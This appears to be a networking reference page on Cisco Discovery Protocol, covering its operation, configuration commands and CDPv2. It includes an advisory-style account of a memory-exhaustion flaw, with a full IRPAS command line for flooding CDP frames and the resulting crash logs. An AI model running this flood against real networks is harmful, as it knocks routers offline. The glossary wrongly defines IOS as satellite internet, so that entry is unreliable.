On this page
|
| SUMMARY | |
| Protocol |
: |
Cisco Discovery Protocol |
| Protocol suite |
: |
Cisco |
| Layer |
: |
Data link Layer |
| Related protocols |
: |
SNMP,
SNAP |
|
| DESCRIPTION |
The Cisco Discovery Protocol (CDP) is a media- and network protocol independent layer 2 protocol that is used to discover information about neighboring network devices. Because CDP operates at the Data Link layer, it doesn't need a network layer protocol, such as IP or IPX, to transfer information. CDP devices send out periodic advertisements to the MAC multicast address 0100.0ccc.cccc, every 60 seconds by default. The holdtime is 180 seconds by default, when exceeded without receiving advertisements the CDP entry is removed from the CDP table.
To aid in network management, Cisco developed the Cisco Discovery Protocol (CDP). CDP support is provided as part of the Cisco IOS software that runs on many types of Cisco equipment.
CDP runs on various media that support the SNAP, including LAN, Frame Relay, and ATM media. CDP runs over the data link layer only. Therefore, two systems that support different network-layer protocols can learn about each other.
When flooded with CDP neighbor announcements, the IOS uses up all it's memory to store the neighbor information. The device is then unable to perform operations that need additional memory such as receiving routing updates and accepting inbound telnet connections.
Since it is a layer two protocol, these packets (frames) are not routed. The updates are send on
Ethernet to the multicast address 01:00:0C:CC:CC:CC.
If a Cisco device receives a CDP frame from another device, it copies the contents into internal data structures that can be viewed by the operator using the 'show cdp neighbors' command. The information includes the Device ID, capabilities, platform and sender's port ID. The CDP frames also include a hold timer value to tell the neighbor when he has to discard the information. The maximum values for this timer is 255 seconds (4 minutes, 15 seconds).
The internal data structure seems to use the remote device ID as key. When receiving two identical but long device IDs, some IOS versions are unable to identify them as identical and stores both of them as independent records.
When flooding a network segment with large CDP frames containing a random device ID and coming from a random data link address, different IOS versions react differently. The range of possible reactions includes:
- Reboot after 3 to 5 frames are received
- Completely stop working after some thousands of frames
- Use all available memory to store CDP neighbor information until the hold timer expires
While the memory of the device is completely filled with CDP information, it is unable to perform other operations that need additional memory allocated. This includes accepting dynamic routing updates or new inbound telnet(1) sessions.
If an operator on the device console tries to debug the CDP traffic using the command 'debug cdp packets', all tested devices crashed.
Interesting is the reaction of the command line 'shell' when flooding the device as seen in the example. At least the help doesn't work anymore. It is not known if this behavior can be used for further exploitation of the device.
Technical Details
CDP uses SNAP frames at the data layer. Media that allow this: all LAN media, Frame Relay, and ATM.
The CDP information is sent periodically to a multicast address. The default period is 60 seconds. Using multicast is kinder and gentler than broadcasting it. It gives non-participants a chance to ignore the traffic, depending on how smart their NIC cards and drivers are.
The CDP announcement contains one or more addresses which can receive SNMP messages. There is also holdtime information in the announcement as well. This means that the information will be discarded if not refreshed before the holdtime expires.
Configuring CDP
Configuring CDP is easy: it's on by default on routers and interfaces (despite what some versions of the documentation may say).
- no cdp run: disables CDP globally
- no cdp enable: disables CDP on an interface (interface command)
Other configuration commands:
- cdp timer seconds: interval between CDP advertisements
- cdp holdtime seconds: holdtime before information should be discarded
Some EXEC commands related to CDP:
- clear cdp counters: reset traffic counters
- clear cdp table: purge the table of neighbor information
Commands
CDPv2 show commands can provide detailed output on VLAN Trunking Protocol (VTP) management domain and duplex modes of neighbor devices, CDP-related counters, and VLAN IDs of connecting ports. The following table lists the CDP commands:
| Command | Purpose | | clear cdp counters | Resets the traffic counters to zero. | | clear cdp table | Deletes the CDP table of information about neighbors. | | show cdp | Displays the interval between transmissions of CDP advertisements, the number of seconds the CDP advertisement is valid for a given port, and the version of the advertisement. | | show cdp entry entry-name [protocol | version] | Displays information about a specific neighbor. Display can be limited to protocol or version information. | | show cdp interface [type number] | Displays information about interfaces on which CDP is enabled. | | show cdp neighbors [type number] [detail] | Displays the type of device that has been discovered, the name of the device, the number and type of the local interface (port), the number of seconds the CDP advertisement is valid for the port, the device type, the device product number, and the port ID. Issuing the detail keyword displays information on the native VLAN ID, the duplex mode, and the VTP domain name associated with neighbor devices. | | show cdp traffic | Displays CDP counters, including the number of packets sent and received and checksum errors. | | show debugging | Displays information about the types of debugging that are enabled for your router. See the Cisco IOS Debug Command Reference for more information about CDP debug commands. |
CDPv2
CDP Version-2 (CDPv2), the most recent release of the protocol, provides more intelligent device tracking features. These features include a reporting mechanism which allows for more rapid error tracking, thereby reducing costly downtime. Reported error messages can be sent to the console or to a logging server, and cover instances of unmatching native VLAN IDs (IEEE 802.1Q) on connecting ports, and unmatching port duplex states between connecting devices.
|
 Top of Page
|
| EXAMPLES |
To send CDP messages, the cdp sender tool from the Phenoelit IRPAS package is use
(http://www.phenoelit.de/irpas/). The command line to send maximum sized cdp frames
with random data link addresses and device names is:
linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v
Be careful when running this! All vulnerable Cisco devices in the data link multicast
domain will be affected (read: all Cisco connected to your Ethernet hub/switch).
Reaction of a Cisco 1603 / IOS 11.2(4):
radio#
%SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from
0x81B3BE6, pool Processor, alignment 0
-Process= "CDP Protocol", ipl= 0, pid= 9
-Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C
radio#
%SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
0x81B26D2, pool Processor, alignment 0
-Process= "CDP Protocol", ipl= 0, pid= 9
-Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
%SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
0x81B26D2, pool Processor, alignment 0
-Process= "CDP Protocol", ipl= 0, pid= 9
-Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
radio#sh ?
% Unrecognized command
radio#show ?
% Unrecognized command
radio#
Reaction after 'debug cdp packets':
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
....[lots of these].....
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format:
%s
*** BUS ERROR ***
access address = 0x5f227998
program counter = 0x80ad45a
status register = 0x2700
vbr at time of exception = 0x4000000
special status word = 0x0045
faulted cycle was a longword read
monitor: command "boot" aborted due to exception
System Bootstrap, Version .....
Copyright (c) 1994-1996 by cisco Systems, Inc.
C1600 processor with 2048 Kbytes of main memory
program load complete, entry point: 0x4018060, size: 0x1da950 |
Top of Page
|
| PROTOCOL RELATIONS |
■ Parent layer
■ Child layer
Ethernet SNAP
| | CDP | |
Top of Page
|
| GLOSSARY |
|
ATM
Asynchronous Transfer Mode (ATM) is a network technology based on transferring data in cells or packets of a fixed size. The cell used with ATM is relatively small compared to units used with older technologies. The small, constant cell size allows ATM equipment to transmit video, audio, and computer data over the same network, and assure that no single type of data hogs the line.
IOS
Internet over Satellit (IOS) technology allows a user to access the Internet via a satellite that orbits the earth. A satellite is placed at a static point above the earth's surface. The satellite in a fixed position, also referred to as geostationary or geosynchronous, is able to maintain a reliable connection to the antennas on the earth because the satellite orbits the earth at the exact speed of the earth's rotation. Because of the enormous distances signals must travel from the earth up to the satellite and back again, IOS is slightly slower than high-speed terrestrial connections over copper or fiber optic cables.
IPX
IPX(Internetwork Packet Exchange), a networking protocol used by the Novell NetWare operating systems. Like UDP/IP, IPX is a datagram protocol used for connectionless communications. Higher-level protocols, such as SPX and NCP, are used for additional error recovery services.
LAN
Local-area network (LAN) is a computer network that spans a relatively small area. Most LANs are confined to a single building or group of buildings. However, one LAN can be connected to other LANs over any distance via telephone lines and radio waves. A system of LANs connected in this way is called a wide-area network (WAN).
Most LANs connect workstations and personal computers. Each node (individual computer ) in a LAN has its own CPU with which it executes programs, but it also is able to access data and devices anywhere on the LAN. This means that many users can share expensive devices, such as laser printers, as well as data. Users can also use the LAN to communicate with each other, by sending e-mail or engaging in chat sessions.
SNAP
SubNetwork Access Protocol (SNAP) is used for encapsulating IP datagrams and ARP requests and replies on IEEE 802 networks. IP datagrams are sent on IEEE 802 networks encapsulated within the 802.2 LLC and SNAP data link layers and the 802.3, 802.4 or 802.5 physical network layers. The SNAP header follows the LLC header and contains an organization code indicating that the following 16 bits specify the EtherType code.
SNMP
SNMP (Simple Network Management Protocol) is a set of protocols for managing complex networks. The first versions of SNMP were developed in the early 80s. SNMP works by sending messages, called protocol data units (PDUs), to different parts of a network. SNMP-compliant devices, called agents, store data about themselves in Management Information Bases (MIBs) and return this data to the SNMP requesters.
VLAN
Virtual LAN (VLAN) is a network of computers that behave as if they are connected to the same wire even though they may actually be physically located on different segments of a LAN. VLANs are configured through software rather than hardware, which makes them extremely flexible. One of the biggest advantages of VLANs is that when a computer is physically moved to another location, it can stay on the same VLAN without any hardware reconfiguration.
|
Top of Page
|
| REFERENCES |
|
|
Top of Page
|
| OTHER PROTOCOLS OF TCP/IP SUITE |
|
|
|
|
|
